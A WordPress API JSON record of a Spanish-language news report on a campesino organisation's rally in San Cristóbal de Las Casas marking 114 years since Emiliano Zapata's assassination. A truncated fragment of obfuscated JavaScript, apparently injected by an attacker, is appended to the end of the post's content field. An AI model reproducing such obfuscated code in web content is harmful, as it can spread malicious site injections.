{"id":15048,"date":"2024-04-11T01:02:01","date_gmt":"2024-04-11T01:02:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15048"},"modified":"2024-04-11T01:02:02","modified_gmt":"2024-04-11T01:02:02","slug":"recuerdan-a-emiliano-zapata-a-114-anos-de-su-asesinato","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15048","title":{"rendered":"Recuerdan a Emiliano Zapata a 114 a\u00f1os de su asesinato"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240410-WA0025-1024x768.jpg\" alt=\"\" class=\"wp-image-15049\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240410-WA0025-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240410-WA0025-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240410-WA0025-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240410-WA0025.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>10 de abril del 2024. San Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Proletaria Emiliano Zapata se dieron cita en la Plaza de la Paz de esta ciudad como parte las actividades a nivel nacional y estatal, abordando temas cr\u00edticos como la inseguridad, la falta de democracia y la carencia de justicia. Esto A 114 a\u00f1os del asesinato del general Emiliano Zapata, donde el clamor del campesinado mexicano sigue siendo ahogado en sangre, &#8220;con la lucha por la recuperaci\u00f3n de las tierras en manos de terratenientes como un reclamo nacional persistente&#8221;, seg\u00fan leyeron en un comunicado.<\/p>\n\n\n\n<p>&#8220;Los gobernantes en turno, bajo diferentes colores pol\u00edticos, son se\u00f1alados como responsables de masacres y cr\u00edmenes de lesa humanidad, desde la matanza estudiantil de 1968 hasta las desapariciones actuales, manteniendo la impunidad. En la actualidad, el campo mexicano sigue en abandono, favoreciendo a las empresas trasnacionales y marginando a los jornaleros agr\u00edcolas&#8221;.<\/p>\n\n\n\n<p>Asimismo, dijeron que la organizaci\u00f3n tambi\u00e9n ha sufrido persecuciones y violencia por parte de la fuerza p\u00fablica y grupos paramilitares, como lo demuestra la reciente desaparici\u00f3n de dos de sus compa\u00f1eros. A pesar de ello, mantienen su lucha por la regularizaci\u00f3n de las tierras, exigiendo el cumplimiento de compromisos firmados por los gobiernos en turno.<\/p>\n\n\n\n<p>En un llamado a la unidad, instan a las organizaciones campesinas a unirse contra la pol\u00edtica neoliberal que afecta al pa\u00eds, buscando fortalecer el movimiento ind\u00edgena, campesino y popular para enfrentar los desaf\u00edos actuales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 10 de abril del 2024. San Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Proletaria Emiliano Zapata se dieron cita en la Plaza de la Paz de esta ciudad como parte las actividades a nivel nacional y estatal, abordando temas cr\u00edticos como la inseguridad, la falta de democracia y la carencia de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15049,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15048","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15048","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15048"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15048\/revisions"}],"predecessor-version":[{"id":15050,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15048\/revisions\/15050"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15049"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15048"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15048"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15048"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}